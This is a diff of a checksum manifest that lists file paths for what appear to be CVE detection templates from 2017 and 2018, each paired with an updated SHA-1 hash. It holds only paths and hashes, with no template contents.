+http/cves/2017/CVE-2017-18024.yaml:1478305e98060f1b2f1fa25a5b80544d2ab414bd +http/cves/2017/CVE-2017-18487.yaml:25575cb9906a6efede366ed9b0ac36267b2fd0f2 +http/cves/2017/CVE-2017-18490.yaml:998fd5ea0b79acdcac05fac620caf6f667e8fe70 +http/cves/2017/CVE-2017-18491.yaml:1edfd4cb21b89853d89f4144ae815e4faec77770 +http/cves/2017/CVE-2017-18492.yaml:eb1fbcff00729bd9edcb1c7655f71eda1aaa361e +http/cves/2017/CVE-2017-18493.yaml:007ddf556147824a080f26810da63eba89bf3ca1 +http/cves/2017/CVE-2017-18494.yaml:f6b006ee6b47ed890fd4dcd8013c841c8a5900d8 +http/cves/2017/CVE-2017-18496.yaml:51699254564009597ae39b1d1b831cbf8f12642f +http/cves/2017/CVE-2017-18500.yaml:84557fa6beb2ec5debf5562af4674d04f57bdecc +http/cves/2017/CVE-2017-18501.yaml:b0f9f493a76a23ddffd6302f87aab38eba250352 +http/cves/2017/CVE-2017-18502.yaml:cb8113de4c9a715d4eeb830833bdf9b027d6974a +http/cves/2017/CVE-2017-18505.yaml:bf6480c816de514737983e9e72de510688d774f6 +http/cves/2017/CVE-2017-18516.yaml:49b97756b7dc35c138b2bb58bf8f6abcf9080d8c +http/cves/2017/CVE-2017-18517.yaml:d2d668e7af659b6401b6fcb276ca0d6a642da1c6 +http/cves/2017/CVE-2017-18518.yaml:9b913d3833697b297ec35aa7f566b46721e772d1 +http/cves/2017/CVE-2017-18527.yaml:83666d783c9fec0ebdf02f5a9ee99cc25523652e +http/cves/2017/CVE-2017-18528.yaml:358b054e63b5f4a3fc1a36c0f732e49c8c4190c5 +http/cves/2017/CVE-2017-18529.yaml:58ca9e2119e4a22fa4460099eb622d8ec9c27e44 +http/cves/2017/CVE-2017-18530.yaml:642ebd104f3d2eb688f5531580b8a7f6b745ab34 +http/cves/2017/CVE-2017-18532.yaml:a78256e3dcd8e848ef92dc84f37111fe841a8a9a +http/cves/2017/CVE-2017-18536.yaml:e6bd763b9286c3be975d477dde7446bd2ba9ed30 +http/cves/2017/CVE-2017-18537.yaml:9f92ef418acfc1a605c0bcc13d6e61d2b13579a3 +http/cves/2017/CVE-2017-18542.yaml:ae8ae069af41dfbdf358986e45175444bab1a6e8 +http/cves/2017/CVE-2017-18556.yaml:7e3c3fc3a74d630b5cc5809f4cb5b851009d406d +http/cves/2017/CVE-2017-18557.yaml:c41be4377dbacbaf7371248bff7ee8413f7439ee +http/cves/2017/CVE-2017-18558.yaml:134e9779d88f02574ed09fdfd2f161cba27c9d42 +http/cves/2017/CVE-2017-18562.yaml:a18c4a16733b2f96191136e2bae5d13f4f235401 +http/cves/2017/CVE-2017-18564.yaml:12c1a6fab0dafd95b190c4aace22e8408d965800 +http/cves/2017/CVE-2017-18565.yaml:2094dc4a8261a9b9ab1106070b3c04deab791894 +http/cves/2017/CVE-2017-18566.yaml:1d620ca62359dd9129ff033cc745fd7c08bbb479 +http/cves/2017/CVE-2017-18598.yaml:174f7e0d8801fcdce5515d3fa5a66fac25cc92d3 +http/cves/2017/CVE-2017-18638.yaml:da519ab796f474cab3dbeee4aac41bfc01b0fe2f +http/cves/2017/CVE-2017-3506.yaml:82013efc6d7697a0aa0a83002d56d0bcfbba691b +http/cves/2017/CVE-2017-3528.yaml:5c04026d0187019c4c0a8489f77c23be6b94d2b4 +http/cves/2017/CVE-2017-4011.yaml:97dc63994161cf47ed53c859602f977b948f1304 +http/cves/2017/CVE-2017-5487.yaml:6eb11218037d631dc8445d65bbfb2b9cfcc44191 +http/cves/2017/CVE-2017-5521.yaml:b930df42b26b7cf2d9523c42bb91aabafc767f04 +http/cves/2017/CVE-2017-5631.yaml:b342096329aa5b3d4f7af3a7d78adef0d8a14449 +http/cves/2017/CVE-2017-5638.yaml:2c9221ec6f301ccdb5191cd9372f62ac0d845648 +http/cves/2017/CVE-2017-5689.yaml:a8a0f3241bf80b61b956571f0240e2c144999775 +http/cves/2017/CVE-2017-5982.yaml:797814dc4f4d0649de16324508da81a82cee260a +http/cves/2017/CVE-2017-6090.yaml:74810745c938b98cf492265cdbf70a7b30f1bbd1 +http/cves/2017/CVE-2017-7269.yaml:019096a42a6dbdbd6ada86908a93ebb54ae8d62b +http/cves/2017/CVE-2017-7391.yaml:b5b82999f6ba8b43fe39fce9ff0ff1d794604647 +http/cves/2017/CVE-2017-7615.yaml:1daf22d9428445b0842ee8f8dbe6ef45e1a58a1f +http/cves/2017/CVE-2017-7855.yaml:3855a1de076fd9d7909b1957850823edb67d963d +http/cves/2017/CVE-2017-7921.yaml:111ecf163dd0ddba7eaf510971ac31fa80b949c6 +http/cves/2017/CVE-2017-7925.yaml:fd10ddb3b654e8b074dc712372019fe6164da158 +http/cves/2017/CVE-2017-8229.yaml:a677f72646c539177bfa70c1c56e451b45076fb9 +http/cves/2017/CVE-2017-8917.yaml:725b470844cffdeba9c6e3215dcc5f570aeeece9 +http/cves/2017/CVE-2017-9140.yaml:da713a41eed42a14a37b476296958e466b9f31b3 +http/cves/2017/CVE-2017-9288.yaml:2ab90f21ee2ab96fdb7fcaa47f967c4d4e67ffc1 +http/cves/2017/CVE-2017-9416.yaml:184a563a6a14279e41d510b5e216918d1ef18d04 +http/cves/2017/CVE-2017-9506.yaml:af5b15ca03b4096e42e2cde8c171a280fa14673e +http/cves/2017/CVE-2017-9791.yaml:c735c919827ef01450dc6a85d48658770f896916 +http/cves/2017/CVE-2017-9805.yaml:6388e3fcd782386ea8aa8833be1cfb8b3a69da0d +http/cves/2017/CVE-2017-9822.yaml:cd57c5f5eef473af774d134019886ecc2a032143 +http/cves/2017/CVE-2017-9833.yaml:77c08d747c594abdd02feaaf0d9023b04101628e +http/cves/2017/CVE-2017-9841.yaml:cda44db9b7514040a843fd2a8a1a3e2cbff8b60d +http/cves/2018/CVE-2018-0127.yaml:f8bc6e1516bb1d33877bf52d59d19a77c9051145 +http/cves/2018/CVE-2018-0296.yaml:1ace5376b8e0a02801f3973766931df30bf44036 +http/cves/2018/CVE-2018-1000129.yaml:999a5d8206a83d2f95b9d734fff8f939254b0e1f +http/cves/2018/CVE-2018-1000130.yaml:40d4dc47340193f799f5e338e3027455d038bd6e +http/cves/2018/CVE-2018-1000226.yaml:55859dfa54141f4c2dfefa2d1459b4d76f673ea7 +http/cves/2018/CVE-2018-1000533.yaml:4ce73f5c8c40d08930071543303bafda1f339256 +http/cves/2018/CVE-2018-1000600.yaml:ce73197fa57067111dae410c658f67b4cc452509 +http/cves/2018/CVE-2018-1000671.yaml:e01c6f4e22674386b844b0792ec67f00f2d00e84 +http/cves/2018/CVE-2018-1000856.yaml:e112bef9cdf4f214f4041d5a56493c4cb5dcfc2f +http/cves/2018/CVE-2018-1000861.yaml:d4442b02df8a33cb6876f189c3cc5b51bfc01766 +http/cves/2018/CVE-2018-10093.yaml:f8dcd472d272fa1dd393063f38c8105c6e03e362 +http/cves/2018/CVE-2018-10095.yaml:cfec3d8c834e3948225f939c5c953f295731d6b3 +http/cves/2018/CVE-2018-10141.yaml:ee15ebc782dfcd18b977822e77f1d551e3d3d4e0 +http/cves/2018/CVE-2018-10201.yaml:8a13127cc4f9bed011ecbf581a09404d0b71bf71 +http/cves/2018/CVE-2018-10230.yaml:b238b0b1a11f95de9572658bd80803115cba28b0 +http/cves/2018/CVE-2018-10562.yaml:cc2f7bb90c5c9e2507310c732aac76fcac202860 http/cves/2018/CVE-2018-10818.yaml:efa3271174cdf4babcac2932f09ca4d5e35b49d2 -http/cves/2018/CVE-2018-10822.yaml:3c917275eb39867b6b6a116a0742f37736d7779f -http/cves/2018/CVE-2018-10823.yaml:c2d12216b6c1738ab4e94e4ab2fcc35ffac10a54 -http/cves/2018/CVE-2018-10956.yaml:bb577ef2c4a277b2092c75d6a2bb50b797ff54da -http/cves/2018/CVE-2018-11227.yaml:d46885b957237a791d183aa90a5159c5f2135006 -http/cves/2018/CVE-2018-11231.yaml:272addd9101abfdaf4545ba444e6b8fba494719a -http/cves/2018/CVE-2018-11409.yaml:c70993f7b5a5f4d82d77f68b33bce55967e5e360 -http/cves/2018/CVE-2018-11473.yaml:21a55dbb80e3bbfea1401212d68438051958eec4 -http/cves/2018/CVE-2018-11709.yaml:6783b9fb81429d60b9d74498d4863ece94d46d4f -http/cves/2018/CVE-2018-11759.yaml:6fa3dde34a89565371feac981ddc3cadf8a08802 -http/cves/2018/CVE-2018-11776.yaml:58ad149ec4ff568b22520a61c50501ecc24262b0 -http/cves/2018/CVE-2018-11784.yaml:34913278bb4abb585ee0b4af8bb12f5ef0f6f52e -http/cves/2018/CVE-2018-12031.yaml:c28ad724ef9b7c2698e3c0f01f3a03318ba2db69 -http/cves/2018/CVE-2018-12054.yaml:4fd5efc95fd31dd48f260bd70efef3272c72d87c -http/cves/2018/CVE-2018-1207.yaml:2fbdba8ab06fb932347f39411bc533eba1e302b8 -http/cves/2018/CVE-2018-12095.yaml:6723a14791a043a11e1d4ce550166d5ac09d062f -http/cves/2018/CVE-2018-12296.yaml:a008cb5e4ee1ad98b5506765e49564a5ff653aa8 -http/cves/2018/CVE-2018-12300.yaml:cd8a04b267914a614cf8d09da5dc49c0698fc6dc -http/cves/2018/CVE-2018-12613.yaml:ce3030e3b0dbc27b243309abf32d0bd87b63698b -http/cves/2018/CVE-2018-12634.yaml:3534b8a3d3615bddd4db21e792b000794a87ed6b -http/cves/2018/CVE-2018-12675.yaml:83d99630ec3a17ffa1e7cebd7f9d60c5a597f577 -http/cves/2018/CVE-2018-1271.yaml:8541c9442f2f670ff648d1a0fa2155138ef21651 -http/cves/2018/CVE-2018-1273.yaml:55f68226afb756c91465f429115d5c099deeae98 -http/cves/2018/CVE-2018-12909.yaml:aeef91085b8292c4a399b137145d21236b5cb4b2 -http/cves/2018/CVE-2018-12998.yaml:cfbd1338f7ab299ff04ed39fbeebb2cdfa8b01ac -http/cves/2018/CVE-2018-1335.yaml:25147e8238bf81dcf2609b74ae5c984a06f368e3 -http/cves/2018/CVE-2018-13379.yaml:2fb0245ee30aeafb70e30fe45f1e2e9b04ca0394 -http/cves/2018/CVE-2018-13380.yaml:0038eb70326d459479036bd1bbefee347eb3081b -http/cves/2018/CVE-2018-13980.yaml:06ab1b7fc2c830d9f926e1c96bade3bad19c5add -http/cves/2018/CVE-2018-14013.yaml:a7769947596bca8862492363c6dd723d6843446d -http/cves/2018/CVE-2018-14064.yaml:ffafb7e582fc0519697f5828de8567f592a8a857 -http/cves/2018/CVE-2018-14474.yaml:6fbd6ea9d314924f4defb5b1870b0942436fd33f -http/cves/2018/CVE-2018-14574.yaml:a3632a205e4c1a94d111de69b98fe2777ea36361 -http/cves/2018/CVE-2018-14728.yaml:66393440b4a5a92e8bc2840b24882d3c33409402 -http/cves/2018/CVE-2018-14912.yaml:de833253ceed6d2d1030601130ab1cf9adaec66e -http/cves/2018/CVE-2018-14916.yaml:d2ccb59afc5523dd8692e21246e7ff49960e5397 -http/cves/2018/CVE-2018-14918.yaml:e3b8ac962532de31cdd8dcd5b452ef27b574d60b -http/cves/2018/CVE-2018-14931.yaml:71248f6252e29ebb19e20ec71e2370e8144d8273 -http/cves/2018/CVE-2018-15138.yaml:04479c172b79b7c8b59e17a95e3aea7f12c6f233 -http/cves/2018/CVE-2018-15517.yaml:3ecba2076959b04184882b880b86aa29c75aa4be -http/cves/2018/CVE-2018-15535.yaml:0438b8e14445d6281200011ed2958966e770a313 -http/cves/2018/CVE-2018-15745.yaml:52b561ebec7b3d2e9b2085c4ccbb68c97c32c71b -http/cves/2018/CVE-2018-15917.yaml:45514d4a358682537a42d451c719219d341a44de -http/cves/2018/CVE-2018-15961.yaml:f61b311e45bf61971e33ae2c7a8d9b5a6fb6922a -http/cves/2018/CVE-2018-16059.yaml:b725485b8595173bfed80e59906b0c7cb5fb2fb5 -http/cves/2018/CVE-2018-16133.yaml:bb729c2bae19f702f1e1a68afb712e759f7b48db -http/cves/2018/CVE-2018-16139.yaml:1f4c8b6ab9fc340321fb233f79f5701eaa1bd2d2 -http/cves/2018/CVE-2018-16159.yaml:b67e9c42d7ebeb999262f28e7a20e9a550e2b735 -http/cves/2018/CVE-2018-16167.yaml:3b60f2bb393ba003c2f0ccd5c3f4e50c2bb07e35 -http/cves/2018/CVE-2018-16283.yaml:84d839580c52b33e85e2ef119d188dfc736567ba -http/cves/2018/CVE-2018-16288.yaml:954c9fa261a4ca6ddcb92169fb691717042cd38f -http/cves/2018/CVE-2018-16299.yaml:d976c9b984c26c1733a4652a7d425700052cfde2 +http/cves/2018/CVE-2018-10822.yaml:82cda0c9798d586b41fd919ae6cb3259f3d9ebd4 +http/cves/2018/CVE-2018-10823.yaml:02831436cab98e47eaf1362f6bcaf5796a63aac8 +http/cves/2018/CVE-2018-10956.yaml:3e5fb4fcf22524f56376c8aeb495419b39726f6f +http/cves/2018/CVE-2018-11227.yaml:1fdf93af9fb0541d2d06592dec16b00462d0138f +http/cves/2018/CVE-2018-11231.yaml:66133d73a340bd29c786aacf3c87fdacc5152464 +http/cves/2018/CVE-2018-11409.yaml:949f9722342e83d31a4be46f83975138bfc2fb3d +http/cves/2018/CVE-2018-11473.yaml:4ccb969019589f33be63f58eefe0359478b82b87 +http/cves/2018/CVE-2018-11709.yaml:13ab6517c8bac73cdb8c0790664b0ac56b6793e6 +http/cves/2018/CVE-2018-11759.yaml:be18130179abb2414049782f7ca0832ba93c8658 +http/cves/2018/CVE-2018-11776.yaml:bf2fa706e65ee67838e1a7b432c738f946a8d93d +http/cves/2018/CVE-2018-11784.yaml:79a8ce38f854e5dbbf6dfb8d571a5c5d344e7318 +http/cves/2018/CVE-2018-12031.yaml:b3f476a1f443898bac4794b2e5e14c23b1307247 +http/cves/2018/CVE-2018-12054.yaml:f1f51cc315c787d17a35b857294965d852a3f6e5 +http/cves/2018/CVE-2018-1207.yaml:0ef955eb840eb869139e89ef49686024ce2fb6f6 +http/cves/2018/CVE-2018-12095.yaml:e20849d564e943f5ee21e0d2aabb21024f8768a9 +http/cves/2018/CVE-2018-12296.yaml:f7607bd8146a3b5166774f97f943c8d01a473cec +http/cves/2018/CVE-2018-12300.yaml:9408ce54483c28c0b9c74965dc730ef849a06361 +http/cves/2018/CVE-2018-12613.yaml:a78bcee42b11d2a0b82a2d77b4026cf1ae632e41 +http/cves/2018/CVE-2018-12634.yaml:664887bd971071c32404ea75911588a21404b78a +http/cves/2018/CVE-2018-12675.yaml:770b670027a7d0d1e3788dcaf36f779543301163 +http/cves/2018/CVE-2018-1271.yaml:fad2d88072bcfb207a0e1fab96ce665e4ca1c31b +http/cves/2018/CVE-2018-1273.yaml:a07e06aa085d72c97a441b13fc87bb6aa263e144 +http/cves/2018/CVE-2018-12909.yaml:e96f5abf429235aab99c5b138ad575c77f3e3fcb +http/cves/2018/CVE-2018-12998.yaml:8645adbc7b587847787fac1ddde51e665debadf9 +http/cves/2018/CVE-2018-1335.yaml:1588597ac8fdbb0edb07825825f72456fbebad0d +http/cves/2018/CVE-2018-13379.yaml:c02062a5c8193daa9c1505ce649531a9e4a5993d +http/cves/2018/CVE-2018-13380.yaml:4717317621965bf7374fe3125bfe7322755c1e2f +http/cves/2018/CVE-2018-13980.yaml:6d67081b76260b8ddc5efa755ff62261e8935df0 +http/cves/2018/CVE-2018-14013.yaml:09480841cc5bf8c4cde1a119a419142480ac7671 +http/cves/2018/CVE-2018-14064.yaml:ec3724d558ef04adb43dbe086fa8e37bac9b1ad8 +http/cves/2018/CVE-2018-14474.yaml:4882d500d8efcf62690c8bef440344fed62bf2bd +http/cves/2018/CVE-2018-14574.yaml:e3e53e2c14fb5877969d8a6f92701a7334da9d99 +http/cves/2018/CVE-2018-14728.yaml:4ff605dfa8a25a10d58b66318974510ab8c42403 +http/cves/2018/CVE-2018-14912.yaml:a63138ae8e39beba765ca06669d219b4b70c58a9 +http/cves/2018/CVE-2018-14916.yaml:d882842216b0807e85c0f54b670b54c83ccbf5c6 +http/cves/2018/CVE-2018-14918.yaml:7972c74205a887a58606be69b59b5d310b331768 +http/cves/2018/CVE-2018-14931.yaml:e6eab79049e6f7af432fb6069d894af1a4bbc625 +http/cves/2018/CVE-2018-15138.yaml:9252063fa474c4e7ad0057dc7691649352586445 +http/cves/2018/CVE-2018-15517.yaml:74e36834594c20db6a3461b63d3b15978aac5162 +http/cves/2018/CVE-2018-15535.yaml:9354c38eee869c8288f02cc7e279b5bb4f4a0dd9 +http/cves/2018/CVE-2018-15745.yaml:240a4875a25b5340bfaa9ffb5071a25b6e7cd622 +http/cves/2018/CVE-2018-15917.yaml:ba35d4dc052a374bf83107b9429b2221d8bffcd4 +http/cves/2018/CVE-2018-15961.yaml:164088c5fd8db2aa077ac55d2fd667e0bba94c55 +http/cves/2018/CVE-2018-16059.yaml:7dcc5a48fb1fb5dd05b5b043c3030749f321ec77 +http/cves/2018/CVE-2018-16133.yaml:e175b271a3146419b989bad20ffb5b0593304f42 +http/cves/2018/CVE-2018-16139.yaml:f0501f87c7ae50bd95a0b90acd66e0041f3c0ee1 +http/cves/2018/CVE-2018-16159.yaml:055be5ecf7aed852d5545c0d6a14199f2ae2ac1b +http/cves/2018/CVE-2018-16167.yaml:a8e3b50fe656a9c5f16845ba145eb15bdabe1183 +http/cves/2018/CVE-2018-16283.yaml:7651daf2cce5d270e34770acafbae696285840cf +http/cves/2018/CVE-2018-16288.yaml:1a191fb15a8b4b434ec760d69cd9736244551377 +http/cves/2018/CVE-2018-16299.yaml:5aa88bdd3054b14b87019e1b2f6fe7a521b3ed0a http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb -http/cves/2018/CVE-2018-16668.yaml:fcf844110da9acc723c9459bc1422f2f3d74655d -http/cves/2018/CVE-2018-16670.yaml:b4d0b8547ac53c6636f01c872b0d2c9c5e8fcc5a -http/cves/2018/CVE-2018-16671.yaml:d62ceb53e96550b0e2432b8404a38459e1f49ce7 -http/cves/2018/CVE-2018-16716.yaml:514550a06f7da5613fd70c265ebd174575dc5168 -http/cves/2018/CVE-2018-16761.yaml:7b044ad99b8323d9c1e8363ec18c12ed02db02b8 -http/cves/2018/CVE-2018-16763.yaml:740786831138ec8274179bd69638c98c32269d57 -http/cves/2018/CVE-2018-16836.yaml:043ba8dbeff8f788bc4bd2e32b750f7f7e952bae -http/cves/2018/CVE-2018-16979.yaml:6be6411454698c94e1f65d76142e623c2416c7d0 -http/cves/2018/CVE-2018-17153.yaml:c6f8aab393afbf888581006eaed4685fe9ef29eb -http/cves/2018/CVE-2018-17246.yaml:409c7ad03e5aa5aba79ffa968f6f5862d5c38a28 -http/cves/2018/CVE-2018-17254.yaml:ba78c1a0725ff08fd91c3b9a4bfa9e4d18631174 -http/cves/2018/CVE-2018-17422.yaml:6f81bc9871e61807f41ba82a188c4c394a740fb5 -http/cves/2018/CVE-2018-17431.yaml:4f3fa6a77be76586758d668492a4f5940aa7208d -http/cves/2018/CVE-2018-18069.yaml:7c0cf1773979ee23931ff6c25e606a77dee5b9df -http/cves/2018/CVE-2018-18264.yaml:8fadba7af2ef8f6bb990d87113babb07de398a12 -http/cves/2018/CVE-2018-18323.yaml:3882238537f5836f09e7a8dc1f71aee483580f0c -http/cves/2018/CVE-2018-18570.yaml:ccf23149a108dd4c4418dfcc9bb5b41995d270d9 -http/cves/2018/CVE-2018-18608.yaml:382fc89ea04ee73b9f4beb2d9fe75e123052b557 -http/cves/2018/CVE-2018-18775.yaml:14c6e7c8c3f415f74c3be98a3bc747d9a59cc3cf -http/cves/2018/CVE-2018-18777.yaml:2f4b4efdcd746937a93182858bf4dc27ea8287dc -http/cves/2018/CVE-2018-18778.yaml:52c6672be663992d51eb408a658e270b2a9c2620 -http/cves/2018/CVE-2018-18809.yaml:fc86c1a873e41605a7858cb3192a0e9ccb5c5500 -http/cves/2018/CVE-2018-18925.yaml:525a6ab868ff77829b4d07d2945b9a8bf56ebd13 -http/cves/2018/CVE-2018-19136.yaml:e7b5cc9bdbfbc5d9d69e30243db2cc14e9313182 -http/cves/2018/CVE-2018-19137.yaml:137d0f6fa5586f8391d0744b56e189210f90be1e -http/cves/2018/CVE-2018-19287.yaml:2eaf07199c972448bfc9a2f19972c0f73e5da904 -http/cves/2018/CVE-2018-19326.yaml:92bbe00e68b3990a5d9a1b0ce70ff70e18fb0ba9 -http/cves/2018/CVE-2018-19365.yaml:ee30b50bc2514a1bf2c66c9ef79855215d2e8c79 -http/cves/2018/CVE-2018-19386.yaml:f185e03e32230ca6303654bd61bc51441f0c36b1 -http/cves/2018/CVE-2018-19439.yaml:c063b63f4fb3610c287a1fe4611dba37b314e538 -http/cves/2018/CVE-2018-19458.yaml:90bde067532dc3ab4a8c54d2e6d9459de0ec10f1 -http/cves/2018/CVE-2018-19749.yaml:4a7c98f9317f538fb820f5864dea8f3f294a74d1 -http/cves/2018/CVE-2018-19751.yaml:d784e0137821c51ec168375c7a19ca2c427e6fab -http/cves/2018/CVE-2018-19752.yaml:c1ed7edfbccf81a010c9495131acbf07f7cb987c -http/cves/2018/CVE-2018-19753.yaml:cd027a3cba8cd9faa2c0b54f7d45fc75fe189cf8 -http/cves/2018/CVE-2018-19877.yaml:825c420507d63d986f27f5f56d2c0c78ba156f4b -http/cves/2018/CVE-2018-19892.yaml:9da029436a8c5ae1fa0defaaee49fad762c4795d -http/cves/2018/CVE-2018-19914.yaml:24ce7b2f8d2f59fe9c748825af3d8d823f4e0788 -http/cves/2018/CVE-2018-19915.yaml:7d8d3be97c2e72b34933ac925ca54b758f2186be -http/cves/2018/CVE-2018-20009.yaml:4ebf4fb0125d82421430496707aefd6fc24e0a8e -http/cves/2018/CVE-2018-20010.yaml:79345de2b3c7dfc667ed7b5932d0bff51115830d -http/cves/2018/CVE-2018-20011.yaml:1b959869ffcddb81c47dc9c1f85606cf61e8fd3b -http/cves/2018/CVE-2018-20462.yaml:ad79a6619293d2e3730ec19288bd867c5f1fd990 -http/cves/2018/CVE-2018-20463.yaml:f9a1a1f75b615dae11a0524c2b99e8fe0a158968 -http/cves/2018/CVE-2018-20470.yaml:4bfb95fd31addb1c7c46a0162ff601358114d39e -http/cves/2018/CVE-2018-20526.yaml:0dcd660574ccd71fd5ecc0aa6189dd82bff22022 -http/cves/2018/CVE-2018-20608.yaml:b0cd3ad5db99d410afdc09b510e70c4a8ddfa64e -http/cves/2018/CVE-2018-20824.yaml:e1620ceff3e66f4d6b20d672c8272a853f6ef331 -http/cves/2018/CVE-2018-20985.yaml:630e41074ea361d71729bfc0976163cb5fffbe46 -http/cves/2018/CVE-2018-2392.yaml:fc1155b966ee49140d2320bc0509ea9c1766531f -http/cves/2018/CVE-2018-2791.yaml:fc2564d4f5439a97725891604f392b6233721b55 -http/cves/2018/CVE-2018-2894.yaml:ae25c4bfd1478ba11901ea7e77c0ed693a500900 -http/cves/2018/CVE-2018-3167.yaml:50fae61533067fac0c61bd49ac6fb8844d096f55 -http/cves/2018/CVE-2018-3238.yaml:55703e0523adc692348f7eaab341b2ac2dc90277 -http/cves/2018/CVE-2018-3714.yaml:ea243dd765899ecc99dabb2750b0f09ad661b5b0 -http/cves/2018/CVE-2018-3760.yaml:9d9190b07f74de4954bf0a12f4381a24c564f25d -http/cves/2018/CVE-2018-3810.yaml:c1d18710533785585edff11e8a47aaedac124825 -http/cves/2018/CVE-2018-5230.yaml:299b796729811fb1dbd8cd0d421f206b3784a540 -http/cves/2018/CVE-2018-5233.yaml:307a40ca83f7ee169372fb6f42e1a966000ab2f3 -http/cves/2018/CVE-2018-5316.yaml:3449079e17e1586133dc273a07a573bd433136ee -http/cves/2018/CVE-2018-5715.yaml:734a4a849e99ac15473ea37e045e2ece2a79c8de -http/cves/2018/CVE-2018-6008.yaml:15d2e43f3b7a042062cf9b11eeb49acadffa0f28 -http/cves/2018/CVE-2018-6184.yaml:e9b0abac3fa2a4e19de61646e6851ab2365859bf -http/cves/2018/CVE-2018-6200.yaml:1b206efde232c3631b917fdfb326c3198d9c6224 -http/cves/2018/CVE-2018-6530.yaml:1aab0132675170dedbd01bd0edc7b98326533a60 -http/cves/2018/CVE-2018-6910.yaml:86273b458c6738d06761635c014af682f52a3bd6 -http/cves/2018/CVE-2018-7251.yaml:4901cb9e0d3bcbb72424e69cbba843ea813c8884 -http/cves/2018/CVE-2018-7282.yaml:fa5be5c11bb1e9d4debf9822fde27a42ec10747a -http/cves/2018/CVE-2018-7422.yaml:33a487fceb6dff8e53aff7f44f0c868d42dbe9fc -http/cves/2018/CVE-2018-7467.yaml:98545f93640a737b8483550a77272ad611135a94 -http/cves/2018/CVE-2018-7490.yaml:78a349d67f6f03a65d7021cf7a2e60b963328c41 -http/cves/2018/CVE-2018-7600.yaml:e7e3cb8580ad1917b860d866f894ddae9e357257 +http/cves/2018/CVE-2018-16668.yaml:4c3366cbdd75dce5923041bdeafb8932dc8b9e72 +http/cves/2018/CVE-2018-16670.yaml:025bd225e66857457a801f24001d7c427c56ada2 +http/cves/2018/CVE-2018-16671.yaml:9cea309313200b130830f5ded547d29285def3f1 +http/cves/2018/CVE-2018-16716.yaml:cc8f20ca53585732dfa720fd58966b33cff94b53 +http/cves/2018/CVE-2018-16761.yaml:9a0f1431dc1b81dcb1cc8216ff2bb488d267a868 +http/cves/2018/CVE-2018-16763.yaml:11723d5c0a0664d57678dbd7301c570a4bc10e32 +http/cves/2018/CVE-2018-16836.yaml:bd7088faa28147afb52568c9f1cd20c73a7604de +http/cves/2018/CVE-2018-16979.yaml:6b32aa418a35227ce6b10a95c916d2bcbf874e8c +http/cves/2018/CVE-2018-17153.yaml:469d5b1a282b35224a49ad07621bdaa2f093e8fa +http/cves/2018/CVE-2018-17246.yaml:aa83ace8206f9cf3dac86453cdb9aeab2f6cfc61 +http/cves/2018/CVE-2018-17254.yaml:e76f8b58e6b27cc72053da71b4e0b1f9c864a6f7 +http/cves/2018/CVE-2018-17422.yaml:20d302cab320adce10a902c0ca88051c544bc9a4 +http/cves/2018/CVE-2018-17431.yaml:291e6586f4e3073a4f4f8c5817e82a93b2131f2a +http/cves/2018/CVE-2018-18069.yaml:de06025813146147f4d3ecb91ec5ff2db6b06210 +http/cves/2018/CVE-2018-18264.yaml:6f0cd1f03cc16e86fef766d33fabc50ae35c20a3 +http/cves/2018/CVE-2018-18323.yaml:adbd02e53507319d81efc9ca2d08ff25fd926766 +http/cves/2018/CVE-2018-18570.yaml:e97c214e6b9af66ba0bb7dbee0814181e9d7f20e +http/cves/2018/CVE-2018-18608.yaml:0bfa43cffe2d08001d806389df86be53ce17b4a8 +http/cves/2018/CVE-2018-18775.yaml:c19eb94283bea278460c5f17dbb547928198de12 +http/cves/2018/CVE-2018-18777.yaml:a651ba06c3b70ab570c39ecf6082a1cadff1db85 +http/cves/2018/CVE-2018-18778.yaml:f4db5f98ec700f96b29d5146202d32915ef9192b +http/cves/2018/CVE-2018-18809.yaml:3446b6801040787c6dbb92c8a8966f65ca2f5aa1 +http/cves/2018/CVE-2018-18925.yaml:d7a5c23af46d6f3c73265f7084e5d6e149d86606 +http/cves/2018/CVE-2018-19136.yaml:42287218452dc2a549f0cee77afa16c8c7f0396c +http/cves/2018/CVE-2018-19137.yaml:915b01f78fdd72ba5bf3c456ac3954d78721cbe8 +http/cves/2018/CVE-2018-19287.yaml:90dcc824c7853ee6e6fe2abc142885dc14450c3b +http/cves/2018/CVE-2018-19326.yaml:98090496fd7a83a70fd24f81f294cb4425d9f093 +http/cves/2018/CVE-2018-19365.yaml:b0d05547624c40a6ccfaef4b78afa33088accb80 +http/cves/2018/CVE-2018-19386.yaml:929af01c739ddc3ab5a00c7c304a4919a1a26135 +http/cves/2018/CVE-2018-19439.yaml:eee5f10fe0873061a02a3202d04fc49088acde16 +http/cves/2018/CVE-2018-19458.yaml:4a93d94ba8f0ff6b5f3e612c717a11eaf6ff84e1 +http/cves/2018/CVE-2018-19749.yaml:6d851ac88eb807439bce5a25b3822f40e50121d0 +http/cves/2018/CVE-2018-19751.yaml:af45c31104adc9766155989a8b5de136935ca604 +http/cves/2018/CVE-2018-19752.yaml:01dadd72f9adbb02eb705d9c36dfbbfe46da5f33 +http/cves/2018/CVE-2018-19753.yaml:9d0291f695309bffc88c6177e7bb85c8a21bc2d5 +http/cves/2018/CVE-2018-19877.yaml:85a93cf9eb74ed32e59fbd841082c0ea0bca45de +http/cves/2018/CVE-2018-19892.yaml:b51e1e3930c95812d0c0d7522e0e49a0c8705bb2 +http/cves/2018/CVE-2018-19914.yaml:e627e59ff940c5733b33b6a2bd302dec31b5a938 +http/cves/2018/CVE-2018-19915.yaml:5eafe6ecc60521b9f205708369e2d37cd61a81d4 +http/cves/2018/CVE-2018-20009.yaml:c89416c97ad5d961f237d9f0775466b8f0a1f64e +http/cves/2018/CVE-2018-20010.yaml:605bdaf958e50dbaccf0dbffd64a3bf774bb73d6 +http/cves/2018/CVE-2018-20011.yaml:e65e48d94f4330a5e4aee27852dca7d477fd336d +http/cves/2018/CVE-2018-20462.yaml:2aaebb6468151d167011650d4230fb30e0046972 +http/cves/2018/CVE-2018-20463.yaml:add7cacc7450b7e13a3d7eb896067985c0644835 +http/cves/2018/CVE-2018-20470.yaml:8ee0a150976cb283ffb931a305c2659d47265c78 +http/cves/2018/CVE-2018-20526.yaml:34d71d1881bf52195a24868fd8fe0fe8a945391f +http/cves/2018/CVE-2018-20608.yaml:6215d0152015342c68f892acd51f5389f3cf475c +http/cves/2018/CVE-2018-20824.yaml:47b17f1513de917215aac26d3ec20fedcca24604 +http/cves/2018/CVE-2018-20985.yaml:2f571e258f6d8a87d0fa730dfea5d667a5c232fd +http/cves/2018/CVE-2018-2392.yaml:cc9c8be5e81388b3554aa51ad9e8f0ec541077b9 